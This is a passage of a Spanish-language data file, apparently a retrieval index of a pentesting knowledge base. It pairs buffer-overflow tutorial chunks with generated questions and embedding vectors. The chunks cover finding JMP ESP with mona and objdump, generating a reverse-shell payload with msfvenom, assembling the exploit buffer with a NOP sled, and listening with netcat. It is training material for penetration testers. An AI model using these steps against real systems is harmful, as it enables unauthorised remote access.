retorno\n```\n!mona jmp -r esp -cpb \"\\x00\\x0a\\x0d\" # busca un JMP ESP sin badchars", "indexar": "como puedo montar un JMP ESP que no contenga badchars con una utilidad?", "v": [-0.10846, 0.0085, -0.17902, -0.0858, -0.18139, 0.00239, -0.07312, 0.07529, -0.16818, -0.1115, -0.14305, 0.192, 0.0951, 0.05091, -0.08038, 0.06201, 0.03362, -0.04333, 0.03315, 0.05944, -0.03992, -0.05187, -0.06344, -0.11218, 0.01958, 0.27278, -0.08101, 0.009, -0.12218, 0.08221, 0.01508, 0.14869, 0.01343, 0.02513, -0.05261, 0.04847, 0.10661, -0.00374, -0.07587, 0.11052, 0.06748, -0.03835, -0.03433, 0.02769, -0.03329, 0.1185, 0.01109, 0.05525, -0.05032, 0.08883, 0.0569, 0.00916, -0.15837, -0.04009, -0.04373, 0.01106, 0.05413, -0.10831, 0.0301, -0.04496, -0.06027, 0.06939, -0.06249, 0.08092, 0.03554, -0.05494, -0.02523, 0.02631, -0.07837, -0.06319, -0.08675, -0.01, 0.0134, -0.12093, -0.0206, 0.05421, -0.01389, -0.02325, 0.07556, 0.05007, 0.07718, -0.15609, -0.06248, 0.06155, 0.01007, -0.09528, -0.01461, -0.05783, 0.01912, -0.07272, 0.10007, 0.02005, 0.09381, 0.12318, -0.05436, -0.15094, 0.08296, 0.11611, 0.04062, 0.01463, 0.00502, 0.12585, -0.02215, -0.0001, 0.03221, 0.0091, 0.03138, -0.08827, 0.07902, -0.03214, 0.06711, 0.02604, -0.11953, 0.04448, -0.09352, -0.11646, -0.06893, -0.03232, -0.0721, -0.03608, -0.01472, -0.00694, 0.04744, -0.02455, 0.04738, -0.02706, 0.04289, 0.0496, 0.04769, 0.05151, 0.01356, -0.0263, -0.05097, -0.03736, -0.03692, -0.0328, 0.01087, 0.00849, -0.06677, 0.02666, -0.03815, 0.00719, -0.02464, -0.05822, 0.00515, 0.06452, 0.07093, -0.10705, 0.05655, -0.00505, 0.09672, 0.03567, 0.01916, 0.01986, 0.07436, 0.02051, 0.09567, -0.01199, -0.01448, 0.04007, -0.0264, 0.0008, -0.01522, 0.04484, 0.04698, -0.05962, 0.00781, -0.05828, 0.07693, 0.01936, 0.00805, 0.03073, -0.0108, -0.00552, 0.03926, 0.06654, -0.02523, 0.06596, 0.00639, -0.03918, -0.00817, -0.03546, -0.05035, 0.01263, -0.08376, -0.05312, -0.03088, 0.024, 0.02318, -0.01657, -0.01485, -0.0231, 0.03183, 0.00698, 0.03303, -0.0442, 0.0097, -0.02202, 0.00755, -0.00436, -0.02159, -0.05239, -0.04077, 0.02811, 0.03262, -0.0419, -0.03398, 0.06379, 0.00615, 0.03946, -0.0158, -0.0215, 0.02552, -0.0588, -0.00436, 0.00753, 0.0002, 0.04553, -0.04411, -0.02646, -0.01595, 0.04437, 0.02417, -0.07504, 0.05688, -0.00504, 0.00445, 0.00064, 0.02795, 0.06465, -0.06097, 0.00238, 0.00275, -0.01418, 0.02012, -0.00126, -0.02076, 0.00201, -0.00148, -0.01778, -0.02061, 0.02264, 0.04941, -0.04577, 0.01135, 0.01343, -0.07868, 0.06124, 0.02996, -0.05975, 0.0144, 0.04557, 0.044, -0.00288, 0.01896, 0.01795]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa: objdump -d vuln.exe | grep -i 'jmp.*esp'\n```\nApunta la direcciΓ³n **en little-endian** (ej. `0x625011AF` β†’ `\\xAF\\x11\\x50\\x62`).", "indexar": "con quΓ© programa puedo analizar un ejecutable y ver cΓ³mo se ven las direcciones en Little Endian?", "v": [-0.07929, 0.22824, -0.12217, 0.06218, 0.03194, 0.04061, 0.06666, -0.04521, -0.11505, -0.15519, -0.08226, -0.09869, -0.03771, -0.08994, 0.09547, 0.05919, 0.07757, -0.1034, 0.13464, -0.03191, -0.03254, -0.01371, -0.02307, 0.02354, -0.04681, 0.09371, 0.06972, 0.10998, -0.00284, -0.00673, -0.09045, 0.06647, 0.0522, -0.09848, 0.08026, 0.07765, 0.0249, 0.04968, 0.00986, 0.10324, 0.01523, 0.01575, -0.11835, -0.02854, 0.00159, -0.03464, 0.00696, 0.03045, -0.04428, -0.09894, -0.06726, 0.05657, -0.07436, -0.01891, 0.08798, -0.04769, -0.02276, -0.1358, 0.15877, 0.02612, -0.01017, -0.02484, 0.06613, -0.02561, 0.07242, -0.00898, 0.04048, 0.00367, -0.01988, 0.01641, -0.04265, 0.0843, -0.04447, 0.02186, 0.00922, 0.03528, -0.05823, 0.06542, 0.04669, 0.01815, 0.01046, -0.05952, -0.09928, 0.08258, -0.10775, 0.06363, -0.05401, -0.08372, -0.02234, -0.07637, 0.04647, 0.02706, -0.02044, 0.06728, 0.05732, -0.01198, 0.07781, -0.00464, -0.00965, 0.07436, 0.06957, -0.02255, -0.17639, 0.10017, 0.00914, 0.11322, 0.05183, -0.04068, -0.02551, -0.04267, -0.00982, 0.01255, -0.08114, -0.1161, -0.13399, -0.07573, -0.07, -0.00682, 0.03118, -0.07161, -0.15072, 0.0051, -0.05474, 0.01771, 0.01587, 0.00492, -0.0256, 0.08828, 0.01857, 0.04325, -0.02395, -0.01243, -0.08845, -0.06547, -0.02618, -0.02068, 0.01844, -0.03382, -0.02219, -0.07617, 0.08489, 0.0226, 0.04811, -0.03997, 0.02547, 0.02273, 0.00404, -0.13751, -0.0445, 0.09346, 0.09354, -0.00418, -0.0174, 0.09917, -0.00431, -0.07762, 0.00862, -0.04142, -0.04492, 0.0448, -0.00808, 0.01292, -0.04785, -0.0758, 0.0856, -0.08541, -0.04027, 0.01567, 0.0705, 0.07005, -0.05009, 0.07351, -0.04267, -0.07437, 0.09253, -0.10246, -0.06009, -0.06676, 0.07747, -0.01026, 0.0189, 0.02692, 0.02658, 0.00066, -0.01836, 0.00163, -0.02539, 0.02625, 0.00285, 0.05093, 0.00935, -0.0101, -0.02611, 0.01787, -0.02252, -0.04532, -0.00853, -0.00305, 0.00535, -0.02226, -0.0623, -0.01658, 0.0012, -0.02614, 0.07979, 0.11035, -0.04693, 0.06865, -0.0443, 0.12078, 0.01039, -0.03062, 0.04651, -0.04404, -0.09747, -0.02804, -0.00548, 0.00728, 0.03349, 0.1042, -0.02886, 0.02066, 0.14327, -0.03154, -0.0227, -0.01196, 0.03348, 0.00796, 0.05574, 0.04335, -0.05364, -0.02227, 0.00318, -0.03455, 0.03463, 0.00776, -0.00915, -0.00396, -0.03497, -0.09348, 0.02778, 0.09086, -0.0312, -0.05801, 0.00378, -0.0631, -0.10778, 0.01573, -0.01405, -0.03619, -0.03707, 0.05105, 0.03966, -0.07136, 0.03404, -0.04347]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa: objdump -d vuln.exe | grep -i 'jmp.*esp'\n```\nApunta la direcciΓ³n **en little-endian** (ej. `0x625011AF` β†’ `\\xAF\\x11\\x50\\x62`).", "indexar": "quΓ© herramienta sirve para desmontar cΓ³digo binario y leer saltos hacia la pila?", "v": [0.1039, -0.04089, -0.18862, -0.02844, -0.07075, -0.27472, -0.03741, -0.09205, -0.08444, -0.13379, -0.00047, -0.12516, 0.06839, -0.03686, 0.12377, -0.04522, 0.00485, -0.09306, -0.01373, -0.13779, -0.03503, 0.01878, -0.02879, -0.02976, -0.07679, 0.0258, 0.02133, 0.02475, -0.19762, 0.13314, 0.04389, 0.12552, 0.15673, -0.06976, 0.01214, -0.07394, 0.01401, 0.05864, -0.06752, 0.09853, -0.10729, 0.08344, -0.03197, -0.00066, -0.09719, -0.03988, -0.02712, 0.12476, -0.02622, 0.04508, -0.01435, 0.02175, 0.02702, -0.05769, -0.02427, -0.14186, 0.16888, -0.04185, -0.02622, -0.14919, 0.01962, -0.04765, 0.05529, -0.00078, -0.04529, -0.09124, 0.04455, 0.02719, -0.19235, 0.06702, -0.03962, 0.01943, -0.02929, 0.08974, 0.0059, -0.00424, 0.02357, -0.03143, 0.08777, 0.01699, 0.03572, -0.02622, -0.029, 0.03545, -0.02906, -0.04762, -0.01927, -0.03902, 0.04176, -0.06327, 0.0458, 0.11689, -0.02864, -0.01664, -0.01598, -0.02942, 0.05228, 0.04042, 0.0369, 0.05151, 0.11173, -0.02692, -0.00434, 0.06377, 0.06102, 0.11534, 0.0423, -0.01577, -0.04336, -0.03288, 0.00103, -0.02131, -0.01733, -0.07585, -0.02624, -0.02852, -0.06283, -0.02395, -0.05683, -0.0042, -0.06182, 0.05749, -0.09998, 0.0168, 0.06041, -0.03415, 0.06547, 0.05255, 0.07029, 0.00022, -0.04196, -0.00287, -0.06512, -0.01935, 0.05133, -0.01509, 0.12401, -0.04245, -0.01637, 0.01094, 0.07906, 0.06691, -0.04167, -0.04965, -0.05985, 0.07353, 0.05146, -0.08605, -0.04249, -0.03917, 0.0157, 0.00638, -0.0268, 0.02884, -0.07742, -0.06021, -0.02306, -0.03642, -0.08973, 0.13409, -0.09462, 0.00242, -0.00305, -0.0212, -0.01744, -0.03814, 0.00208, -0.03047, 0.02907, 0.01654, -0.01794, 0.03353, 0.0335, -0.02382, 0.07722, -0.07809, -0.10549, 0.02456, -0.04196, -0.04016, -0.06098, -0.00222, 0.0437, -0.04109, 0.011, -0.06101, -0.0042, -0.03378, 0.02555, -0.01397, 0.04626, -0.0081, -0.02686, -0.07001, -0.0524, -0.02826, -0.01957, -0.03305, 0.02286, -0.06965, 0.02462, 0.03747, -0.00696, -0.05394, 0.11118, 0.06105, -0.01989, -0.05062, -0.04664, 0.07685, 0.03088, -0.09956, 0.08074, -0.05252, -0.02691, -0.04111, 0.01398, 0.04931, -0.00721, -0.03621, 0.05599, -0.00629, 0.06275, 0.03565, 0.01308, 0.03349, 0.03113, 0.03791, -0.00517, 0.04741, -0.02496, -0.01213, -0.01683, 0.02932, 0.05669, 0.00156, 0.01479, 0.01571, -0.07406, -0.10252, 0.00734, 0.0348, -0.05155, -0.04507, -0.03635, -0.01443, -0.02033, 0.01098, 0.00953, -0.05693, -0.03308, 0.00419, 0.03077, -0.06827, 0.00292, 0.00017]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa: objdump -d vuln.exe | grep -i 'jmp.*esp'\n```\nApunta la direcciΓ³n **en little-endian** (ej. `0x625011AF` β†’ `\\xAF\\x11\\x50\\x62`).", "indexar": "cuΓ‘l es una alternativa libre a objdump para inspeccionar archivos ejecutables?", "v": [0.0258, -0.04847, -0.00632, -0.00019, 0.02765, -0.01929, 0.01924, -0.05827, -0.1626, -0.12129, -0.17208, -0.11337, 0.05203, 0.06144, 0.02756, 0.00936, 0.05379, -0.09245, 0.00045, -0.02457, -0.05806, 0.02473, -0.10894, -0.02913, -0.06425, -0.04888, -0.07698, 0.15198, -0.19328, -0.05264, -0.00437, 0.044, 0.10099, -0.0956, 0.09781, 0.10293, 0.04342, 0.04095, -0.06839, 0.06029, 0.02046, 0.01791, -0.15735, 0.0844, -0.00723, -0.04122, -0.00703, 0.0815, -0.10208, -0.01278, -0.07573, 0.08009, -0.13978, -0.01027, 0.02684, -0.01338, 0.02134, -0.1579, 0.09015, 0.02824, -0.03287, 0.10954, 0.00984, -0.0519, 0.09795, -0.01457, -0.05426, 0.01632, 0.0073, 0.03473, -0.00738, 0.03249, 0.07332, 0.06939, -0.08373, 0.01234, -0.05528, -0.04953, 0.01683, 0.05557, 0.06763, -0.14607, -0.05464, 0.11582, 0.00776, -0.12656, -0.02921, -0.10522, -0.0472, -0.00083, 0.13657, 0.04933, 0.02543, 0.12464, -0.0067, -0.05921, 0.08953, 0.04772, 0.03893, 0.04388, 0.06914, -0.00286, -0.11534, 0.02731, 0.04579, 0.02154, -0.05426, 0.1108, -0.02103, -0.09275, 0.06763, 0.08172, 0.03781, 0.06415, -0.11284, -0.11576, -0.10747, -0.03985, 0.03886, -0.00272, -0.03554, -0.01035, -0.05905, -0.07395, -0.04102, -0.02825, -0.00709, 0.02312, -0.00957, 0.06017, -0.00046, 0.06051, -0.06751, -0.07326, -0.11904, -0.01875, 0.06698, -0.04943, -0.01714, -0.10063, 0.14973, -0.04202, 0.05656, 0.03697, 0.07861, -0.03956, 0.03102, -0.03042, -0.00684, -0.02711, -0.04122, -0.02968, -0.00621, 0.05144, 0.00724, 0.02274, 0.00488, -0.04892, -0.04676, 0.0999, 0.01094, 0.0152, -0.08943, -0.0188, 0.05671, -0.06649, 0.0, 0.00615, -0.04591, -0.05918, 0.01078, 0.04934, -0.01766, -0.09499, 0.03917, -0.06555, -0.04071, -0.08771, 0.07012, -0.06347, -0.0081, 0.01594, -0.09474, -0.00236, -0.0215, -0.04259, 0.05849, -0.00885, 0.00887, 0.10844, 0.00615, 0.02152, -0.05227, -0.06615, -0.06556, 0.02251, -0.02981, -0.02086, -0.08423, 0.01566, -0.06119, -0.01945, -0.01735, -0.0376, 0.03356, -0.03019, -0.03853, 0.08457, -0.01924, 0.05293, 0.03376, -0.04765, 0.14282, 0.01669, -0.02672, 0.00083, 0.04988, 0.00841, 0.07723, 0.0176, 0.02094, 0.0181, 0.07009, -0.01658, -0.00752, 0.11076, -0.01602, 0.0426, -0.04016, 0.01566, -0.02184, 0.02631, 0.04384, 0.01486, 0.02767, -0.01031, 0.03062, -0.00325, -0.00768, -0.06372, 0.05199, 0.06752, -0.05225, 0.00395, -0.02222, -0.016, -0.05662, 0.01304, 0.02174, -0.00958, 0.01072, 0.0894, -0.0159, 0.01272, 0.02163, -0.01662]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 6. Shellcode con msfvenom\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread \\\n -b \"\\x00\\x0a\\x0d\" -f py -v shellcode", "indexar": "que programa puedo usar para generar cΓ³digo shell en Windows?", "v": [-0.04765, -0.03428, -0.08806, -0.1481, -0.05642, -0.16316, -0.05154, -0.05231, -0.02157, -0.16019, -0.10943, -0.10149, -0.05623, -0.1578, -0.0809, -0.02303, 0.03329, -0.13915, 0.0235, 0.02818, -0.00882, -0.03632, -0.06718, -0.08, -0.05697, 0.07706, 0.01043, -0.01753, -0.05834, -0.03871, 0.00938, -0.0821, 0.07522, -0.08969, -0.09689, 0.0716, 0.03622, 0.07194, 0.03237, 0.11164, 0.00464, 0.10443, -0.09272, 0.08217, 0.11859, 0.00308, 0.11966, -0.03297, -0.00239, -0.0197, -0.05125, -0.03903, -0.08807, 0.00593, 0.12515, -0.07022, 0.0855, -0.14781, -0.09069, 0.05403, -8e-05, 0.02652, 0.02629, -0.0015, -0.01683, -0.00413, 0.09632, 0.0219, -0.07959, 0.09834, -0.05129, 0.04037, 0.02137, -0.02634, 0.05159, 0.09334, -0.08583, -0.10979, 0.08404, 0.0176, -0.03053, 0.03277, 0.04436, -0.00818, -0.05655, -0.11056, 0.02825, -0.07233, 0.01864, -0.13102, 0.06833, -0.0456, -0.01059, 0.11982, 0.08221, -0.06542, 0.02919, 0.04461, 0.0366, 0.09633, 0.0241, -0.14859, -0.0113, 0.11816, 0.07217, 0.08934, 0.06304, -0.05047, -0.02872, 0.0556, -0.03575, -0.04579, -0.12654, -0.03334, -0.11131, 0.00104, -0.0145, -0.08917, 0.04489, -0.06071, -0.08086, 0.05796, -0.11164, 0.06373, 0.05578, 0.01857, -0.01918, 0.14334, -0.11278, 0.01485, -0.0156, 0.01539, -0.02481, -0.00389, -0.07568, 0.02892, 0.0458, 0.0229, 0.05307, -0.01683, 0.04828, 0.08021, 0.03081, 0.10068, -0.02411, 0.03847, -0.00416, -0.02841, -0.06771, -0.03623, 0.07039, -0.00371, -0.07442, 0.00624, -0.10954, 0.00845, 0.04367, 0.0828, 0.00057, -0.02802, -0.07459, -0.00595, -0.06637, -0.03828, 0.06079, -0.04234, -0.01249, 0.0376, 0.04792, 0.04173, 0.01461, 0.08226, 0.0907, -0.07291, 0.04515, 0.00322, 0.01202, -0.04565, -0.07241, -0.03527, -0.07024, 0.06975, 0.06984, -0.05431, -0.02291, 0.01626, -0.01788, 0.09285, -0.04235, 0.00224, -0.04136, 0.03834, 0.06832, -0.02237, -0.0336, 0.00392, 0.02538, -0.02641, 0.03951, -0.05869, -0.0433, 0.07934, -0.01144, -0.08092, 0.1042, 0.07546, -0.06889, 0.00541, 0.07686, 0.08697, 0.00851, -0.04522, 0.03908, 0.01526, -0.02609, -0.01417, 0.00055, 0.05435, 0.06971, -0.00177, 0.01146, 0.00613, 0.01458, 0.04736, 0.0167, -0.07748, -0.04595, 0.01611, -0.0044, 0.01531, -0.01259, -0.0026, 0.01481, -0.01376, 0.02451, 0.01742, -0.00687, -0.02125, -0.03188, -0.07413, -0.06091, 0.08148, -0.03323, -0.07209, -0.03575, 0.01114, -0.04927, -0.01375, -0.00794, -0.01743, -0.02664, -0.0094, 0.01789, -0.04834, -0.00343, 0.07114]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 6. Shellcode con msfvenom\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread \\\n -b \"\\x00\\x0a\\x0d\" -f py -v shellcode", "indexar": "cual es una alternativa libre a los generadores de payloads de metasploit?", "v": [0.07157, -0.05016, -0.06979, -0.04376, -0.03537, 0.06587, 0.00722, -0.0406, -0.26394, -0.03201, -0.10345, -0.0052, -0.03105, 0.03576, 0.06296, 0.01311, -0.00528, -0.08275, 0.03692, -0.08807, -0.15045, -0.03149, -0.1148, -0.16089, -0.00123, 0.15913, -0.02859, 0.02394, -0.17407, 0.13421, -0.00776, 0.02888, -0.0222, -0.09253, 0.00929, -0.00157, 0.05013, 0.17798, 0.0728, -0.00223, -0.05864, -0.0019, -0.12036, 0.06131, 0.12999, -0.12865, 0.04906, 0.008, 0.0424, -0.04796, -0.02127, 0.0545, -0.04146, 0.10347, -0.01658, -0.04676, 0.18321, -0.12802, -0.13745, 0.01475, -0.05877, 0.11538, 0.0476, -0.06443, -0.06353, -0.06486, -0.06358, 0.05508, -0.07433, 0.01552, 0.10317, -0.02229, 0.01822, -0.0046, 0.0166, 0.056, -0.02996, -0.03812, 0.01962, 0.14838, 0.04378, -0.0784, -0.07948, 0.06525, -0.05064, -0.05331, 0.10897, 0.00799, 0.08282, -0.01472, 0.01499, 0.00779, -0.04736, 0.13386, -0.05904, -0.0728, 0.0573, 0.06641, 0.03092, 0.08547, 0.05111, 0.08585, 0.02967, -0.00465, 0.08951, 0.06374, -0.01792, -0.00018, -0.00471, -0.03864, 0.13371, -0.00854, 0.09745, 0.06743, -0.00736, -0.05761, -0.00226, 0.08032, -0.0038, -0.01106, -0.07483, 0.00343, 0.06224, -0.03269, 0.03149, 0.00549, 0.01771, 0.02556, 0.0303, 0.02745, 0.06106, 0.05977, 0.01353, -0.01161, -0.07788, -0.0809, 0.12815, -0.05772, -0.01475, 0.02416, 0.00818, 0.07877, 0.08196, 0.02985, 0.0247, -0.03149, -0.01018, -0.02861, -0.01431, -0.0535, 0.01454, 0.00612, -0.00912, 0.03739, -0.06109, -0.05226, -0.01053, 0.05079, 0.01001, 0.04617, 0.03564, 0.02213, -0.06445, -0.02483, -0.02393, -0.00264, 0.02277, -0.03792, -0.07265, 0.08603, 7e-05, -0.01569, 0.08537, -0.04785, 0.08562, -0.09767, -0.04047, -0.07484, 0.022, 0.01193, -0.10974, 0.04282, -0.02369, 0.021, 0.00665, -0.0864, 0.01674, -0.02196, 0.08708, 0.06211, 0.06503, 0.04645, -0.02827, -0.12167, -0.00583, -0.01681, -0.00788, 0.00032, 0.01007, 0.01256, 0.02933, -0.10414, -0.00352, -0.04097, -0.01036, -0.0035, -0.08936, 0.0068, 0.03012, 0.00788, 0.09727, -0.00443, 0.08462, -0.0115, -0.10224, -0.00169, -0.0155, -0.00528, -0.01979, 0.05027, 0.04696, 0.01491, 0.03633, -0.0207, -0.01963, 0.06611, 0.03593, 0.05217, 0.00889, -0.0061, -0.00526, 0.04238, 0.0239, 0.04218, 0.02145, 0.019, 0.00142, 0.02574, -0.00387, -0.01798, 0.09075, 0.0117, -0.01305, -0.04994, -9e-05, 0.03707, -0.03374, -0.0345, -0.03422, -0.04118, -0.03969, 0.05452, 0.00682, 0.02262, 0.05844, -0.00121]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 6. Shellcode con msfvenom\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread \\\n -b \"\\x00\\x0a\\x0d\" -f py -v shellcode", "indexar": "como monto un reverse TCP con shellcode en python?", "v": [0.0669, -0.20418, -0.11035, -0.01388, -0.0971, -0.16589, -0.00188, 0.06782, -0.07521, -0.0032, -0.01454, 0.13403, 0.14247, -0.01289, -0.02168, -0.0564, -0.09432, -0.04136, 0.13303, -0.07705, -0.03579, -0.10787, -0.05943, -0.13179, 0.13528, 0.17097, -0.02057, 0.04372, -0.04796, -0.10213, 0.0566, -0.0812, 0.04883, 0.11137, -0.1181, 0.0105, 0.08539, 0.05011, -0.09433, 0.11967, -0.09149, -0.05233, -0.06875, 0.11916, -0.01745, -0.03384, 0.10917, 0.06691, 0.01508, -0.00654, -0.13088, -0.12719, -0.13716, -0.06769, 0.01412, -0.01363, 0.08614, 0.03584, 0.08059, 0.01676, -0.12055, -0.00284, -0.04579, -0.03801, -0.02207, 0.02195, -0.03163, -0.11657, -0.19405, 0.01396, -0.04848, 0.06666, -0.05064, 0.00976, 0.01098, -0.04207, -0.06741, -0.08177, 0.00229, 0.00759, -0.15341, -0.09745, -0.08101, 0.04032, -0.07701, -0.13146, 0.0564, -0.00155, 0.09126, -0.00212, -0.02918, 0.07661, 0.03637, 0.04292, -0.03211, -0.00761, -0.04762, 0.03017, -0.07102, 0.05251, -0.04743, 0.0031, 0.12807, 0.08712, 0.0483, 0.07311, -0.01028, 0.06355, -0.01741, 0.03526, 0.0416, -0.02664, -0.08227, 0.0299, -0.0701, -0.16998, -0.05941, 0.02486, 0.05906, -0.03207, -0.02123, 0.09699, -0.06907, 0.09875, 0.00459, 0.06449, 0.01261, 0.11539, -0.0737, -0.00684, -0.02232, 0.03691, -0.01478, -0.00607, -0.04353, 0.04229, 0.04748, 0.02628, 0.03338, 0.02422, -0.01236, 0.09276, -0.01361, 0.02408, 0.06326, 0.02806, 0.0154, -0.07407, -0.10677, 0.0453, 0.0446, 0.08589, -0.03814, -0.01854, -0.04883, -0.02752, -0.03986, -0.02192, -0.00837, -0.0114, -0.04651, -0.03057, -0.02427, -0.05168, 0.01566, -0.06579, -0.03679, -0.00198, 0.04039, -0.05176, -0.02881, 0.01379, 0.08689, -0.00772, 0.03556, -0.06704, 0.02965, 0.01653, -0.05386, -0.01453, 0.01055, -0.0187, -0.0252, -0.07021, 0.03254, 0.02029, 0.06473, 0.07198, -0.03441, -0.00718, -0.01526, 0.05153, -0.02753, 0.00249, -0.03287, -0.0014, 0.09232, -0.0074, 0.0698, 0.00671, 0.03215, 0.02316, -0.00298, -0.05021, -0.00834, 0.04448, -0.06283, 0.02413, 0.00915, -0.00453, 0.02211, -0.00855, 0.04989, 0.09643, 0.02572, 0.00222, -0.00607, 0.08888, -0.00638, -0.00641, -0.04743, -0.0347, 0.04074, 0.05614, -0.01637, -0.03382, 0.03233, -0.02028, 0.00411, 0.00504, -0.0399, 0.03765, 0.02934, 0.02205, -0.0312, 0.0202, -0.01994, -0.0064, -0.01234, -0.00816, -0.03526, 0.03465, 0.01182, -0.06283, 0.0027, 0.00853, -0.01071, 0.00639, -0.0119, -0.00462, -0.03178, -0.00606, -0.03256, -0.02939, -0.07438, -0.01658]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 7. Exploit final\n```\nbuffer = prefix + b\"A\"*offset + jmp_esp + b\"\\x90\"*16 + shellcode\n```\nLevanta `nc -lvnp 443` (Reverse shell) y lanza. NOP sled (`\\x90`*16) da margen al decoder.\n\nRelacionado: Metasploit Β· Reverse shell Β· Exploits conocidos Β· OSCP MOC", "indexar": "que herramienta sirve para ejecutar un reverse shell en Python?", "v": [0.0178, -0.05702, -0.13159, -0.19858, 0.04218, -0.17155, -0.13336, -0.06562, 0.04577, -0.00199, -0.01077, 0.06844, 0.05062, -0.07246, -0.03517, 0.00987, -0.0948, -0.13709, 0.04051, -0.02096, -0.10227, 0.04345, -0.10662, -0.12915, 0.00386, 0.16642, 0.03323, 0.08398, -0.15546, 0.01613, -0.01391, 0.01594, 0.07991, -0.04287, -0.13881, -0.00243, 0.00727, 0.04726, -0.0178, 0.07826, -0.07951, 0.00919, -0.07927, 0.15856, -0.07035, 0.02377, 0.05729, 0.01217, -0.0136, 0.07519, -0.05588, -0.19481, -0.1818, 0.0153, 0.07619, -0.09905, 0.12798, -0.1099, 0.05097, -0.09857, -0.15727, -0.05193, -0.01089, -0.00807, 0.03025, 0.00853, -0.05706, -0.09908, -0.07706, 0.08625, -0.10129, 0.06456, 0.02937, 0.0554, -0.04216, -0.08611, -0.03893, 0.03527, -0.03303, 0.04747, -0.08025, -0.11761, -0.10843, 0.03969, 0.0097, -0.1066, 0.00565, -0.06002, 0.09207, -0.01858, 0.0034, 0.1267, 0.00931, 0.0523, 0.00333, 0.04318, 0.06455, -0.05932, -0.04462, 0.00383, 0.10404, -0.08647, 0.01476, 0.08943, -0.01138, 0.04957, -0.08488, 0.06761, -0.05068, 0.04604, 0.09111, -0.03357, 0.03253, 0.01745, -0.04601, -0.06324, -0.04845, -0.02367, 0.02215, -0.00169, 0.02668, 0.06061, -0.11433, 0.02773, -0.05856, 0.02877, -0.00856, 0.08356, 0.00382, -0.05139, -0.02579, -0.04212, -0.03697, 0.06385, -0.08214, 0.10365, 0.11619, -0.08745, 0.02295, -0.05179, -0.00117, 0.0653, -0.05246, -0.02297, 0.01356, -0.02872, 0.07675, -0.06166, -0.04715, -0.00846, 0.10186, -0.03073, -0.03032, 0.03873, -0.09269, -0.07359, -0.07513, 0.02542, -0.05624, -0.03636, -0.01698, -0.06067, 0.02734, -0.0296, 0.05531, -0.05549, -0.0301, 0.02446, 0.04859, 0.04595, 0.03636, 0.01255, 0.08199, -0.01168, 0.01305, -0.06777, -0.01199, 0.02264, 0.00779, -0.02614, 0.01018, -0.05292, -0.03207, -0.06239, 0.0433, -0.01507, 0.03935, 0.03063, -0.02025, 0.0438, -0.01626, 0.06233, 0.00325, -0.08885, 0.02424, 0.06307, 0.02746, -0.04486, 0.0521, -0.00688, 0.02345, 0.00847, -0.01308, -0.01916, -0.00175, 0.07824, -0.07493, -0.02462, -0.02827, -0.02231, 0.00232, 0.04325, 0.02525, 0.06738, 0.05311, -0.04339, 0.00621, 0.05979, 0.02085, 0.03961, -0.05673, -0.0239, 0.05018, 0.01788, -0.0161, -0.03211, 0.02879, -0.02946, -0.01374, -0.03565, -0.02218, -0.01924, 0.00807, 0.02854, -0.03112, -0.05141, -0.00234, -0.02659, -0.01406, -0.01729, -0.04141, 0.05645, 0.00073, -0.0633, -0.00537, -0.01336, 0.00525, -0.03695, -0.04731, -0.02449, -0.03681, 0.00263, 0.03329, -0.0358, -0.01433, 0.00287]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 7. Exploit final\n```\nbuffer = prefix + b\"A\"*offset + jmp_esp + b\"\\x90\"*16 + shellcode\n```\nLevanta `nc -lvnp 443` (Reverse shell) y lanza. NOP sled (`\\x90`*16) da margen al decoder.\n\nRelacionado: Metasploit Β· Reverse shell Β· Exploits conocidos Β· OSCP MOC", "indexar": "con que puedo levantar una conexiΓ³n inversa sin usar Metasploit?", "v": [-0.02931, 0.08421, -0.23136, -0.02357, -0.00618, 0.03987, -0.1791, -0.11194, -0.13532, -0.09894, -0.13177, -0.11511, 0.00829, 0.04385, -0.02503, 0.03002, 0.01717, -0.03927, -0.02158, -0.25467, -0.06987, -0.05361, -0.00957, -0.19396, -0.0108, 0.1484, -0.00981, 0.08681, -0.02385, -0.11574, -0.16983, 0.01796, -0.01914, 0.09027, -0.0272, -0.03703, -0.01321, 0.09643, 0.17023, 0.01719, -0.06614, 0.08546, -0.06386, 0.10791, 0.025, -0.03408, 0.05384, -0.10327, -0.07707, 0.06873, -0.14691, -0.02576, -0.11497, -0.08459, -0.15719, -0.09286, 0.07829, -0.00753, -0.02418, -0.03902, 0.0154, 0.03212, -0.05086, 0.04438, 0.03287, -0.05746, -0.06008, -0.01477, -0.07337, 0.04678, -0.02344, 0.0706, -0.02775, -0.0066, 0.10767, 0.09154, 0.06724, -0.06653, 0.08498, 0.044, -0.12018, -0.03793, -0.06025, -0.03938, -0.036, -0.062, -0.0122, -0.03671, 0.10472, -0.00185, 0.03377, -0.03405, -0.02254, 